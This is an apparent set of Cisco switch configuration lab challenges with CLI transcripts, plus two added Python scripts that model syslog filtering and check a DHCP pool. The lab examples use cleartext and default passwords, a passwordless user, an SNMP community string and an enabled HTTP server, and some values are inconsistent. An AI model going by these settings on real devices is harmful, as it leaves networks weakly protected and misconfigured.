  autocommand          Automatically issue a command after the user logs in
  callback-dialstring  Callback dialstring
  callback-line        Associate a specific line with this callback
  callback-rotary      Associate a rotary group with this callback
  dnis                 Do not require password when obtained via DNIS
  nocallback-verify    Do not require authentication after callback
  noescape             Prevent the user from using an escape character
  nohangup             Do not disconnect after an automatic command
  nopassword           No password is required for the user to log in
  password             Specify the password for the user
  privilege            Set user privilege level
  secret               Specify the secret for the user
  user-maxlinks        Limit the user's number of inbound links
  <cr>
(config)# username june password ?
  0     Specifies an UNENCRYPTED password will follow
  7     Specifies a HIDDEN password will follow
  LINE  The UNENCRYPTED (cleartext) user password
(config)# username june password default1
(config)# snmp-server ?
  chassis-id        String to uniquely identify this chassis
  community         Enable SNMP; set community string and access privs
  contact           Text for mib object sysContact
  enable            Enable SNMP Traps or Informs
  engineID          Configure a local or remote SNMPv3 engineID
  group             Define a User Security Model group
  host              Specify hosts to receive SNMP notifications
  ifindex           Enable ifindex persistence
  inform            Configure SNMP Informs options
  location          Text for mib object sysLocation
  manager           Modify SNMP manager parameters
  packetsize        Largest SNMP packet size
  queue-length      Message queue length for each TRAP host
  system-shutdown   Enable use of the SNMP reload command
  tftp-server-list  Limit TFTP servers used via SNMP
  trap              SNMP trap options
  trap-source       Assign an interface for the source address of all traps
  trap-timeout      Set timeout for TRAP message retransmissions
  user              Define a user who can access the SNMP engine
  view              Define an SNMPv2 MIB view
(config)# snmp-server community ?
  WORD  SNMP community string
(config)# snmp-server community popup
(config)# snmp-server contact ?
  LINE  identification of the contact person for this managed node
(config)# snmp-server contact june
(config)# snmp-server location ?
  LINE  The physical location of this node
(config)# snmp-server location glasgow
(config)# snmp-server enable ?
  informs  Enable SNMP Informs
  traps    Enable SNMP Traps
(config)#snmp-s enable traps ?
  bridge            Enable SNMP STP Bridge MIB traps
  c2900             Enable SNMP c2900 traps
  cluster           Enable Cluster traps
  config            Enable SNMP config traps
  entity            Enable SNMP entity traps
  envmon            Enable SNMP environmental monitor traps
  flash             Enable SNMP FLASH notifications
  hsrp              Enable SNMP HSRP traps
  mac-notification  Enable SNMP MAC Notification traps
  port-security     Enable SNMP port security traps
  rtr               Enable SNMP Response Time Reporter traps
  snmp              Enable SNMP traps
  syslog            Enable SNMP syslog traps
  vlan-membership   Enable SNMP VLAN membership traps
  vlancreate        Enable SNMP VLAN created traps
  vlandelete        Enable SNMP VLAN deleted traps
  vtp               Enable SNMP VTP traps
  <cr>
(config)# snmp-server enable traps
(config)# snmp-server chassis-id ?
  LINE  Unique ID string
(config)# snmp-server chassis-id brighton

Cisco Switch Challenge 4

Outline
This challenge involves the configuration of a hosts table.
Objectives
The objectives of this challenge are to:

Define the default gateway.
Enable an IP hosts table.

Example
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# ip default-gateway 142.163.250.7

(config)# ip host ?
WORD Name of host
(config)# ip host brechin ?
<0-65535>   Default telnet port number
A.B.C.D     Host IP address
additional  Append addresses
(config)# ip host brechin 209.250.181.10
(config)# ip host mississippi 208.194.196.5
(config)# ip host westvirginia 205.27.128.4
(config)# exit
# show hosts

Cisco Switch Challenge 5

Outline
This challenge involves the configuration of Ethernet port settings and CDP.
Objectives
The objectives of this challenge are to:

Set up a description on FA0/1.
Set up a speed on FA0/1.
Set up duplex on FA0/1.
Define CDP details.

Example
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# int fa0/1
(config-if)# no shutdown
(config-if)# description ?
LINE Up to 240 characters describing this interface
(config-if)# description aironet 1200
(config-if)# speed ?
10    Force 10 Mbps operation
100   Force 100 Mbps operation
auto  Enable AUTO speed configuration
(config-if)# speed 100
(config-if)# duplex ?
auto Enable AUTO duplex configuration
full Force full duplex operation
half Force half-duplex operation
(config-if)# duplex full
(config-if)# int fa0/2
(config-if)# no shutdown
(config-if)# exit
(config)# cdp run
(config)# int fa0/1
(config-if)# cdp ?
enable Enable CDP on interface
(config-if)# cdp enable

(config-if)# exit
(config)# cdp ?
advertise-v2  CDP sends version-2 advertisements
holdtime      Specify the holdtime (in sec) to be sent in packets
timer         Specify the rate at which CDP packets are sent (in sec)
run
(config)# cdp timer ?
<5-254> Rate at which CDP packets are sent (in sec)
(config)# cdp timer 89
(config)# cdp hold ?
<10-255> Length of time (in sec) that receiver must keep this packet
(config)# cdp holdtime 41

Cisco Switch Challenge 6

Outline
This challenge involves the configuration of VLANs.
Objectives
The objectives of this challenge are to:

Set up VLAN 1, and define an IP address.
Set up VLAN 2, and define an IP address.

Example
> en
# vlan database
(vlan)# vlan 1 name newjersey
VLAN 1 added:
Name: newjersey
(vlan)# ?
VLAN database editing buffer manipulation commands:
abort  Exit mode without applying the changes
apply  Apply current changes and bump revision number
exit   Apply changes, bump revision number, and exit mode
no     Negate a command or set its defaults
reset  Abandon current changes and reread current database
show   Show database information
vlan   Add, delete, or modify values associated with a single VLAN
vtp    Perform VTP administrative functions.
(vlan)# vlan 2 ?
are        Maximum number of All Route Explorer hops for this VLAN
backupcrf  Backup CRF mode of the VLAN
bridge     Bridging characteristics of the VLAN
media      Media type of the VLAN
mtu        VLAN Maximum Transmission Unit
name       Ascii name of the VLAN
parent     ID number of the Parent VLAN of FDDI or Token Ring type VLANs
ring       Ring number of FDDI or Token Ring type VLANs
said       IEEE 802.10 SAID
state      Operational state of the VLAN
ste        Maximum number of Spanning Tree Explorer hops for this VLAN
stp        Spanning tree characteristics of the VLAN
tb-vlan1   ID number of the first translational VLAN for this VLAN (or zero if none)
tb-vlan2   ID number of the second translational VLAN for this VLAN (or zero if none)
<cr>
(vlan)# vlan 2 name ?
WORD The ascii name for the VLAN
(vlan)# vlan 2 name brighton
VLAN 2 added:
Name: brighton
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int vlan 1
(config-if)# ip address 131.45.110.4 255.192.0.0
(config-if)# shutdown
(config-if)# exit
(config)# int vlan 2
(config-if)# ip address 81.200.53.4 255.255.0.0
(config-if)# exit

Note that the vlan database command is being phased out. The preferred method is to configure the VLAN from global configuration mode:
Switch(config)# vlan 1
Switch(config-vlan)# ?
VLAN configuration commands:
are           Maximum number of All Route Explorer hops for this VLAN (or zero if none specified)
backupcrf     Backup CRF mode of the VLAN
bridge        Bridging characteristics of the VLAN
exit          Apply changes, bump revision number, and exit mode
media         Media type of the VLAN
mtu           VLAN Maximum Transmission Unit
name          Ascii name of the VLAN
no            Negate a command or set its defaults
parent        ID number of the Parent VLAN of FDDI or Token Ring type VLANs
private-vlan  Configure a private VLAN
remote-span   Configure as Remote SPAN VLAN
ring          Ring number of FDDI or Token Ring type VLANs
said          IEEE 802.10 SAID
shutdown      Shutdown VLAN switching
state         Operational state of the VLAN
ste           Maximum number of Spanning Tree Explorer hops for this VLAN (or zero if none specified)
stp           Spanning tree characteristics of the VLAN
tb-vlan1      ID number of the first translational VLAN for this VLAN (or zero if none)
tb-vlan2      ID number of the second translational VLAN for this VLAN (or zero if none)

Switch(config-vlan)# name ?
WORD The ascii name for the VLAN
Switch(config-vlan)# name newjersey

Cisco Switch Challenge 7


Outline
This challenge involves the configuration of switchport access parameters.
Objectives
The objectives of this challenge are to:

Set up VLAN 2.
Define switchport access for VLAN 2.

Example
> en
# vlan database
(vlan)# vlan 2 name amsterdam
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int vlan 2
(config-if)# ip address 161.161.238.9 255.255.255.248
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access ?
vlan  Set VLAN when interface is in access mode
(config-if)# switchport access vlan 2
(config-if)# int fa0/5
(config-if)# switchport access vlan 2

Note that the vlan database command is being phased out. The preferred method is to configure the VLAN from global configuration mode:
Switch(config)# vlan 2
Switch(config-vlan)# ?
VLAN configuration commands:
are           Maximum number of All Route Explorer hops for this VLAN (or zero if none specified)
backupcrf     Backup CRF mode of the VLAN
bridge        Bridging characteristics of the VLAN
exit          Apply changes, bump revision number, and exit mode
media         Media type of the VLAN
mtu           VLAN Maximum Transmission Unit
name          Ascii name of the VLAN
no            Negate a command or set its defaults
parent        ID number of the Parent VLAN of FDDI or Token Ring type VLANs
private-vlan  Configure a private VLAN
remote-span   Configure as Remote SPAN VLAN
ring          Ring number of FDDI or Token Ring type VLANs
said          IEEE 802.10 SAID
shutdown      Shutdown VLAN switching
state         Operational state of the VLAN
ste           Maximum number of Spanning Tree Explorer hops for this VLAN (or zero if none specified)
stp           Spanning tree characteristics of the VLAN
tb-vlan1      ID number of the first translational VLAN for this VLAN (or zero if none)
tb-vlan2      ID number of the second translational VLAN for this VLAN (or zero if none)

Switch(config-vlan)# name ?
WORD The ascii name for the VLAN
Switch(config-vlan)# name newjersey

Cisco Switch Challenge 8

Outline
This challenge involves the configuration of timeouts for the console.
Objectives
The objectives of this challenge are to:

Set up a password on the console.
Define timeouts for the console.

Example
> en
# config t
(config)# line con 0
(config-line)# password lothian
(config-line)# timeout ?
login Timeouts related to the login sequence
(config-line)# timeout login ?
response Timeout for any user input during login sequences
(config-line)# timeout login response ?
<0-300> Timeout in seconds
(config-line)# timeout login response 19
(config-line)# exec-timeout ?
<0-35791> Timeout in minutes
(config-line)# exec-timeout 11
(config-line)# log ?
synchronous Synchronized message output
(config-line)# log synchronous
(config-line)# line vty 0 8
(config-line)# login
(config-line)# password mississippi
(config-line)# timeout login response 12
(config-line)# exec-timeout 10

Cisco Switch Challenge 9

Outline
This challenge involves the configuration of the clock, boot system and DHCP pool.
Objectives
The objectives of this challenge are to:

Set up the clock.
Define the boot system.
Define the name of the DHCP pool.

Example
# clock ?
set  Set the time and date
# clock set 06:25
# config t
(config)# ip ?
Global IP configuration subcommands:
access-list           Named access-list
accounting-list       Select hosts for which IP accounting information is kept
accounting-threshold  Sets the maximum number of accounting entries
accounting-transits   Sets the maximum number of transit entries
alias                 Alias an IP address to a TCP port
default-gateway       Specify default gateway (if not routing IP)
dhcp-server           Specify address of DHCP server to use
domain-list           Domain name to complete unqualified host names.
domain-lookup         Enable IP Domain Name System hostname translation
domain-name           Define the default domain name
finger                finger server
ftp                   FTP configuration commands
gdp                   Router discovery mechanism
gratuitous-arps       Generate gratuitous ARPs for PPP/SLIP peer addresses
host                  Add an entry to the ip hostname table
host-routing          Enable host-based routing (proxy ARP and redirect)
hp-host               Enable the HP proxy probe service
http                  HTTP server configuration
icmp                  ICMP options
igmp                  IGMP options
local                 Specify local options
name-server           Specify address of name server to use
radius                RADIUS configuration commands
rcmd                  Rcmd commands
reflexive-list        Reflexive access list
security              Specify system wide security information
source-route          Process packets with source routing header options
sticky-arp            Allow the creation of sticky ARP entries
subnet-zero           Allow 'subnet zero' subnets
tacacs                TACACS configuration commands
tcp                   Global TCP parameters
telnet                Specify telnet options
tftp                  tftp configuration commands
(config)# ip subnet-zero
(config)# ip classless
(config)# boot system ?
WORD   TFTP filename or URL
flash  Boot from flash memory
mop    Boot from a Decnet MOP server
rcp    Boot from a server via rcp
tftp   Boot from a tftp server
(config)# boot system tftp c28.bin
(config)# ip dhcp ?
conflict                   DHCP address conflict parameters
database                   Configure DHCP database agents
excluded-address           Prevent DHCP from assigning certain addresses
limited-broadcast-address  Use all 1's broadcast address
ping                       Specify ping parameters used by DHCP
pool                       Configure DHCP address pools
relay                      DHCP relay agent parameters
smart-relay                Enable Smart Relay feature
(config)# ip dhcp pool ?
WORD  Pool name
(config)# ip dhcp pool paris
(dhcp-config)# ?
DHCP pool configuration commands:
bootfile             Boot file name
client-identifier    Client identifier
client-name          Client name
default-router       Default routers
dns-server           DNS servers
domain-name          Domain name
exit                 Exit from DHCP pool configuration mode
hardware-address     Client hardware address
host                 Client IP address and mask
lease                Address lease time
netbios-name-server  NetBIOS (WINS) name servers
netbios-node-type    NetBIOS node type
network              Network number and mask
next-server          Next server in boot process
no                   Negate a command or set its defaults
option               Raw DHCP options

Cisco Switch Challenge 10


Outline
This challenge involves the configuration of the Ethernet ports.
Objectives
The objectives of this challenge are to:

Set up the first three Ethernet ports.

Example
# config t
(config)# int e0/1
(config-if)# description aironet 1200
(config-if)# shutdown
(config-if)# int e0/2
(config-if)# description production depart
(config-if)# shutdown
(config-if)# int e0/3
(config-if)# shutdown

Cisco Switch Challenge 11

Outline
This challenge involves the configuration of passwords and usernames.
Objectives
The objectives of this challenge are to:

Define the name server.
Define the passwords.
Set up usernames and passwords.

Example
> en
# config t
(config)# ip name-server 205.105.14.3
(config)# password dates
(config)# enable password default
(config)# enable secret dates
(config)# username katie password hotel
(config)# username william password eggplant
(config)# username anne ?
access-class         Restrict access by access-class
autocommand          Automatically issue a command after the user logs in
callback-dialstring  Callback dialstring
callback-line        Associate a specific line with this callback
callback-rotary      Associate a rotary group with this callback
dnis                 Do not require password when obtained via DNIS
nocallback-verify    Do not require authentication after callback
noescape             Prevent the user from using an escape character
nohangup             Do not disconnect after an automatic command
nopassword           No password is required for the user to log in
password             Specify the password for the user
privilege            Set user privilege level
secret               Specify the secret for the user
user-maxlinks        Limit the user's number of inbound links
(config)# username anne nopassword

Cisco Switch Challenge 12

Outline
This challenge involves the configuration of switchports.
Objectives
The objectives of this challenge are to:

Define the switchport mode.
Enable trunking.
Define spanning-tree costs.

Example
# config t
(config)# int fa0/1
(config-if)# switchport ?
access         Set access mode characteristics of the interface
block          Disable forwarding of unknown uni/multi cast addresses
broadcast      Set broadcast suppression level on this interface
encapsulation  Set trunking encapsulation when interface is in trunking mode
host           Set port host
mode           Set trunking mode of the interface
multicast      Set multicast suppression level on this interface
native         Set trunking native characteristics when interface is in trunking mode
nonegotiate    Device will not engage in negotiation protocol on this interface
port-security  Security related command
priority       Set appliance 802.1p priority
protected      Configure an interface to be a protected port
pruning        Set pruning VLAN characteristics when interface is in trunking mode
trunk          Set trunking characteristics of the interface
unicast        Set unicast suppression level on this interface
voice          Voice appliance attributes
<cr>
(config-if)# switchport mode ?
access        Set trunking mode to ACCESS unconditionally
dot1q-tunnel  Set trunking mode to DOT1Q TUNNEL unconditionally
dynamic       Set trunking mode to dynamically negotiate access or trunk mode
trunk         Set trunking mode to TRUNK unconditionally
(config-if)# switchport mode trunk
(config-if)# switchport trunk ?
allowed        Set allowed VLAN characteristics when interface is in trunking mode
encapsulation  Set trunking encapsulation when interface is in trunking mode
native         Set trunking native characteristics when interface is in trunking mode
pruning        Set pruning VLAN characteristics when interface is in trunking mode
(config-if)# switchport trunk encapsulation ?
dot1q      Interface uses only 802.1q trunking encapsulation when trunking
isl        Interface uses only ISL trunking encapsulation when trunking
negotiate  Device will negotiate trunking encapsulation with peer on interface
(config-if)# switchport trunk encapsulation dot1q

(config-if)# spanning-tree ?
bpdufilter     Don't send or receive BPDUs on this interface
bpduguard      Don't accept BPDUs on this interface
cost           Change an interface's spanning tree port path cost
guard          Change an interface's spanning tree guard mode
link-type      Specify a link type for spanning tree protocol use
port-priority  Change an interface's spanning tree port priority
portfast       Enable an interface to move directly to forwarding on link up
stack-port     Enable stack port
vlan           VLAN Switch Spanning Tree
(config-if)# spanning-tree cost ?
<1-200000000> port path cost
(config-if)# spanning-tree cost 3
(config-if)# int fa0/2
(config-if)# switchport mode trunk
(config-if)# switchport trunk encapsulation dot1q
(config-if)# spanning-tree cost 31
(config-if)# int fa0/3
(config-if)# switchport mode trunk
(config-if)# switchport trunk encapsulation dot1q
(config-if)# spanning-tree cost 33

Cisco Switch Challenge 13

Outline
This challenge involves the configuration of the host table, hostname and default gateway.
Objectives
The objectives of this challenge are to:

Define the default gateway.
Define the hostname.
Create a hosts table.

Example
> en
# config t
(config)# ip default-gateway 36.125.171.9

(config)# hostname montana


montana (config)# ip host tennessee 211.99.108.9
montana (config)# ip host kirkcaldy 154.242.2.8
montana (config)# ip host edinburgh 64.2.249.2

Cisco Switch Challenge 14

Outline
This challenge involves the configuration of logging.
Objectives
The objectives of this challenge are to:

Enable logging.
Define the syslog server.
Define the buffer size.
Define the logging level.

Example
> enable
# config t
(config)# lo ?
Hostname or A.B.C.D  IP address of the logging host
buffered             Set buffered logging parameters
cns-events           Set CNS Event logging level
console              Set console logging level
exception            Limit size of exception flush output
facility             Facility parameter for syslog messages
file                 Set logging file parameters
history              Configure syslog history table
monitor              Set terminal line (monitor) logging level
on                   Enable logging to all supported destinations
rate-limit           Set messages per second limit
source-interface     Specify interface for source address in logging transactions
trap                 Set syslog server logging level
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffer ?
<0-7>              Logging severity level
<4096-2147483647>  Logging buffer size
alerts             Immediate action needed           (severity=1)
critical           Critical conditions               (severity=2)
debugging          Debugging messages                (severity=7)
emergencies        System is unusable                (severity=0)
errors             Error conditions                  (severity=3)
informational      Informational messages            (severity=6)
notifications      Normal but significant conditions (severity=5)
warnings           Warning conditions                (severity=4)
<cr>
(config)# logging buffer 440240
(config)# logging host 138.24.170.8
Switch(config)# logging trap ?
<0-7>          Logging severity level
alerts         Immediate action needed           (severity=1)
critical       Critical conditions               (severity=2)
debugging      Debugging messages                (severity=7)
emergencies    System is unusable                (severity=0)
errors         Error conditions                  (severity=3)
informational  Informational messages            (severity=6)
notifications  Normal but significant conditions (severity=5)
warnings       Warning conditions                (severity=4)
<cr>
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffer emergency
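IOS severity numbers run opposite to importance, and a destination keeps only messages whose severity number is at or below its configured level, so the emergency level set on all four destinations above keeps severity-0 messages alone and drops the configuration-change and failed-login notifications a monitoring team relies on. The following Python script is an added example, not part of the NetworkSims material: it models that filter for the Challenge 14 levels against constructed syslog lines; the level keyword is spelled `emergencies`, as the help output lists it, and `MONITORING_CONFIG` is the example's own alternative set of levels.

```python
"""Model which IOS syslog messages each logging destination keeps.

Added example, not part of the NetworkSims material: the configuration lines
repeat the levels set in Challenge 14 and the syslog lines are constructed
samples in the standard %FACILITY-SEVERITY-MNEMONIC form.
"""
import re

# Severity keywords and numbers exactly as "logging trap ?" lists them above.
SEVERITY = {
    "emergencies": 0, "alerts": 1, "critical": 2, "errors": 3,
    "warnings": 4, "notifications": 5, "informational": 6, "debugging": 7,
}

# Destinations whose threshold is set with "logging <destination> <level>";
# "buffer" is the abbreviation typed in the transcript for "buffered".
DESTINATIONS = {"trap": "trap", "monitor": "monitor", "console": "console",
                "buffered": "buffered", "buffer": "buffered"}

MSG_RE = re.compile(
    r"%(?P<facility>[A-Z0-9_]+)-(?P<sev>[0-7])-(?P<mnemonic>[A-Z0-9_]+): (?P<text>.*)")


def resolve_level(word):
    """Map a level given as a digit or an unambiguous keyword prefix to its number."""
    if word.isdigit():
        number = int(word)
        if not 0 <= number <= 7:
            raise ValueError(f"severity out of range: {word}")
        return number
    hits = [name for name in SEVERITY if name.startswith(word)]
    if len(hits) != 1:
        raise ValueError(f"unknown or ambiguous severity keyword: {word}")
    return SEVERITY[hits[0]]


def parse_logging_levels(config_lines):
    """Return {destination: highest severity number that destination still keeps}."""
    levels = {}
    for line in config_lines:
        parts = line.strip().split()
        if len(parts) == 3 and parts[0] == "logging" and parts[1] in DESTINATIONS:
            levels[DESTINATIONS[parts[1]]] = resolve_level(parts[2])
    return levels


def parse_message(line):
    """Extract facility, numeric severity and mnemonic from one syslog line, else None."""
    match = MSG_RE.search(line)
    if not match:
        return None
    return {"facility": match["facility"], "severity": int(match["sev"]),
            "mnemonic": match["mnemonic"]}


def kept_messages(log_lines, config_lines):
    """For every configured destination, the mnemonics that pass its threshold.

    A destination keeps a message when the message's severity number is less
    than or equal to the configured level, so "emergencies" (0) keeps the least.
    """
    messages = [m for m in (parse_message(line) for line in log_lines) if m]
    levels = parse_logging_levels(config_lines)
    return {dest: [m["mnemonic"] for m in messages if m["severity"] <= level]
            for dest, level in levels.items()}


# Levels set in Challenge 14 (keyword spelled as the help output lists it).
PAGE_CONFIG = [
    "logging on",
    "logging 212.72.52.7",
    "logging trap emergencies",
    "logging monitor emergencies",
    "logging console emergencies",
    "logging buffer emergencies",
]

# Levels a monitoring team would more typically want for the same destinations.
MONITORING_CONFIG = [
    "logging trap informational",
    "logging buffered informational",
    "logging console errors",
]

# Constructed sample events, not captured from a device.
SAMPLE_LOG = [
    "%PLATFORM-0-EXAMPLE: constructed severity-0 message",
    "%SYS-5-CONFIG_I: Configured from console by vty0 (192.168.1.1)",
    "%SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 192.168.1.50]",
    "%LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to down",
    "%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down",
]

if __name__ == "__main__":
    for label, config in (("page", PAGE_CONFIG), ("monitoring", MONITORING_CONFIG)):
        for dest, kept in kept_messages(SAMPLE_LOG, config).items():
            print(f"{label:10s} {dest:8s} keeps {kept}")
```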

Cisco Switch Challenge 15

Outline
This challenge involves the configuration of the HTTP server and the creation of banners.
Objectives
The objectives of this challenge are to:

Enable HTTP.
Define the HTTP server port.
Define authentication.
Define the helper path.
Define an access-class number.
Create banners.

Example
> en
# config t
(config)# ip http server
(config)# ip http port ?
<0-65535> HTTP port
(config)# ip http port 1024
(config)# ip http ?
access-class    Restrict access by access-class
authentication  Set http authentication method
help-path       HTTP help root URL
path            Set base path for HTML
port            HTTP port
server          Enable HTTP server
(config)# ip http authentication ?
enable  Use enable passwords
local   Use local username and passwords
tacacs  Use tacacs to authorize user

(config)# ip http authentication local


(config)# ip http help-path ?
WORD root URL for help pages
(config)# ip http help-path file:///c:\wireless\help
(config)# ip http access-class 10
(config)# banner motd gorgie home
(config)# banner login welcome
(config)# banner exec admin device

Cisco Switch Challenge 16

Outline
This challenge involves the configuration of the clock and boot settings.
Objectives
The objectives of this challenge are to:

Define the clock setting.
Define the boot method.

Example
# clock ?
set Set the time and date
# clock set 06:25
(config)# ip subnet-zero
(config)# ip classless
(config)# boot ?
boothlpr             Boot Helper System Image
buffersize           Specify the buffer size for filesystem-simulated NVRAM
config-file          Configuration File
enable-break         Enable Break while booting
helper               Helper Image(s)
helper-config-file   Helper Configuration File
manual               Manual Boot
private-config-file  Private Configuration File
system               System Image
(config)# boot system ?
WORD   TFTP filename or URL
flash  Boot from flash memory
mop    Boot from a Decnet MOP server
rcp    Boot from a server via rcp
tftp   Boot from a tftp server
(config)# boot system tftp c28.bin

Cisco Switch Challenge 17


Outline
This challenge involves the configuration of the DHCP server.
Objectives
The objectives of this challenge are to:

Set up a DHCP pool.
Define the network addresses.
Define the DNS server.
Define the NetBIOS server.
Set up the lease time.
Define the default-router.
Define excluded addresses.
Define the ping timeout.

Example
> en
# config t
(config)#ip dhcp pool ?
WORD Pool name
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 ?
/nn or A.B.C.D Network mask or prefix length
<cr>
(config-dhcp)# network 249.189.108.0 255.255.255.254
(config-dhcp)# dns-server ?
Hostname or A.B.C.D Server's name or IP address
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
conflict                   DHCP address conflict parameters
database                   Configure DHCP database agents
excluded-address           Prevent DHCP from assigning certain addresses
limited-broadcast-address  Use all 1's broadcast address
ping                       Specify ping parameters used by DHCP
pool                       Configure DHCP address pools
relay                      DHCP relay agent parameters
smart-relay                Enable Smart Relay feature
(config)# ip dhcp e ?
A.B.C.D  Low IP address
(config)# ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
WORD     Pool name
packets  Specify number of ping packets
timeout  Specify ping timeout
(config)# ip dhcp ping timeout ?
<100-10000> Ping timeout in milliseconds
(config)# ip dhcp ping timeout 350
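The pool above is only as usable as the relationship between its statements allows: `network` bounds what can be leased, `default-router` has to sit inside it to be reachable by clients, and `excluded-address` only matters where it overlaps the pool. The following Python script is an added example, not from the NetworkSims material, that parses the Challenge 17 commands and reports those relationships; `VARIANT_CONFIG` is a constructed comparison with a /24 mask and does not appear on the page.

```python
"""Sanity-check an IOS DHCP pool against the addresses configured around it.

Added example, not from the NetworkSims material: it parses the pool and
excluded-address commands typed in Challenge 17 and reports whether the
default router, the exclusions and the pool size agree with the network statement.
"""
import ipaddress

SERVER_ROLES = ("default-router", "dns-server", "netbios-name-server")


def parse_dhcp_config(lines):
    """Return (pools, excluded): pool name -> settings, plus a list of (low, high) exclusions."""
    pools, excluded, current = {}, [], None
    for raw in lines:
        parts = raw.strip().split()
        if not parts:
            continue
        if parts[:3] == ["ip", "dhcp", "pool"] and len(parts) == 4:
            current = pools.setdefault(parts[3], {"servers": {}})
        elif parts[:3] == ["ip", "dhcp", "excluded-address"] and len(parts) in (4, 5):
            low = ipaddress.ip_address(parts[3])      # single address, or
            high = ipaddress.ip_address(parts[-1])    # low..high when two are given
            excluded.append((low, high))
        elif current is not None and parts[0] == "network" and len(parts) == 3:
            # Both forms offered by the help output: dotted mask or "/nn" prefix length.
            mask = parts[2] if parts[2].startswith("/") else "/" + parts[2]
            current["network"] = ipaddress.ip_network(parts[1] + mask, strict=False)
        elif current is not None and parts[0] in SERVER_ROLES:
            current["servers"][parts[0]] = [ipaddress.ip_address(a) for a in parts[1:]]
        elif current is not None and parts[0] == "lease":
            current["lease"] = " ".join(parts[1:])    # days [hours [minutes]] or "infinite"
        elif parts == ["exit"]:
            current = None
    return pools, excluded


def check_pool(name, pool, excluded):
    """Return human-readable findings for one pool; an empty list means it is consistent."""
    findings = []
    net = pool.get("network")
    if net is None:
        return [f"{name}: no network statement, so the pool can lease nothing"]
    # A /31 or /32 has no separate network and broadcast address to set aside.
    usable = net.num_addresses if net.prefixlen >= 31 else net.num_addresses - 2
    if usable <= 2:
        findings.append(f"{name}: {net} leaves only {usable} assignable address(es)")
    for gateway in pool["servers"].get("default-router", []):
        if gateway not in net:
            findings.append(f"{name}: default-router {gateway} is outside {net}; clients cannot reach it")
        elif not any(low <= gateway <= high for low, high in excluded):
            findings.append(f"{name}: default-router {gateway} is leasable; add an excluded-address for it")
    # dns-server and netbios-name-server may legitimately sit on another subnet, so they are not flagged.
    reserved = 0
    for low, high in excluded:
        lo, hi = max(int(low), int(net[0])), min(int(high), int(net[-1]))
        if lo <= hi:
            reserved += hi - lo + 1
        else:
            span = str(low) if low == high else f"{low}-{high}"
            findings.append(f"{name}: excluded-address {span} is not in {net} and has no effect on this pool")
    if usable - reserved <= 0:
        findings.append(f"{name}: every assignable address in {net} is excluded")
    return findings


def audit(lines):
    """Findings per pool for a list of configuration lines."""
    pools, excluded = parse_dhcp_config(lines)
    return {name: check_pool(name, pool, excluded) for name, pool in pools.items()}


# The commands typed in Challenge 17, in the order they appear in the transcript.
PAGE_CONFIG = [
    "ip dhcp pool wyoming",
    "network 249.189.108.0 255.255.255.254",
    "dns-server 249.189.108.58",
    "netbios-name-server 249.189.108.61",
    "lease 3",
    "default-router 249.189.108.87",
    "exit",
    "ip dhcp excluded-address 249.189.108.26",
    "ip dhcp ping timeout 350",
]

# A constructed variant of the same pool whose network statement contains the
# gateway and whose exclusion covers it, for comparison.
VARIANT_CONFIG = [
    "ip dhcp pool wyoming",
    "network 249.189.108.0 /24",
    "dns-server 249.189.108.58",
    "netbios-name-server 249.189.108.61",
    "lease 3",
    "default-router 249.189.108.87",
    "exit",
    "ip dhcp excluded-address 249.189.108.1 249.189.108.99",
]

if __name__ == "__main__":
    for label, config in (("page", PAGE_CONFIG), ("variant", VARIANT_CONFIG)):
        for pool_name, problems in audit(config).items():
            print(f"{label}: pool {pool_name}: {problems or 'consistent'}")
```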

Cisco Switch Challenge 18


Outline
This challenge involves the configuration of services on the device.
Objectives
The objectives of this challenge are to:

Set up services.
Define timestamp formats.
Disable small TCP servers.
Disable small UDP servers.

Example
> en
# config t
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug  Timestamp debug messages
log    Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime  Timestamp with date and time
uptime    Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
